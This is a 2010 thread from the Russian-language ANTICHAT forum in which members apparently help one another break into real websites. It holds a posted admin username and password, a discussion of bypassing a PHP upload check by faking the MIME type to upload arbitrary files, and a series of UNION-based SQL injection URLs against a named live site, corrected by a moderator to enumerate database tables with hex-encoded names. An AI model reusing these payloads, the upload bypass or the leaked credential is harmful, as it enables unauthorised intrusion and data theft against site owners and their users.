ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.03.2010, 17:05
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
Как это сделать?
SIPT/Toolza
|
|
|
13.03.2010, 18:18
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
а кстати вот и админ adminn:mikahakka
|
|
|
|
13.03.2010, 20:50
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Имеется такой код:
PHP код:
$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;
if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так? |
|
|
|
13.03.2010, 20:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Nek1t
Имеется такой код:
PHP код:
$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;
if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так? можно, только там дописывается расширение gif, jpg или bmp. Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).
Это случайно не голландский сайт?
Последний раз редактировалось попугай; 13.03.2010 в 21:03..
|
|
|
|
13.03.2010, 21:44
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Сообщение от попугай
можно, только там дописывается расширение gif, jpg или bmp.
Код еще раз глянь, расширение берется то, которое пришло: $imagen = $id.".".$extension; //imagename
Сообщение от попугай
Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).
Ну да, это я еще с начала попробовал.
Сообщение от попугай
Это случайно не голландский сайт?
Лол, нет.
|
|
|
|
13.03.2010, 21:18
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
И снова я 
Вот все же не могу разобраться. Вот что ввожу:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю? |
|
|
|
13.03.2010, 21:19
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от CyberHunter
И снова я
Вот все же не могу разобраться. Вот что ввожу:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю?
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8, 9,10,11,12+from+information_schema.columns+where+t able_name=0x434f4c554d4e5f50524956494c45474553+LIM IT+1,1+--+
Хексить религия не позваляет?
|
|
|
|
13.03.2010, 21:47
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Хексить религия не позваляет?
Ну с этим понятно, но почему при таком вводе опять ошибка?
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8, %209,10,11,12+from+information_schema.columns+wher e+table_name=hex%28%27fusers%27%29+limit+1,1+--+
Или как нужно "хексить" ?
|
|
|
|
13.03.2010, 21:52
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от CyberHunter
Ну с этим понятно, но почему при таком вводе опять ошибка?
Или как нужно "хексить" ?
Мдаа, а ты задумывался над тем, что ты написал?)
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1+--+
|
|
|
|
13.03.2010, 21:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от CyberHunter
Ну с этим понятно, но почему при таком вводе опять ошибка?
Или как нужно "хексить" ?
http://ctacok.ru/he.php?c=text2hex
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид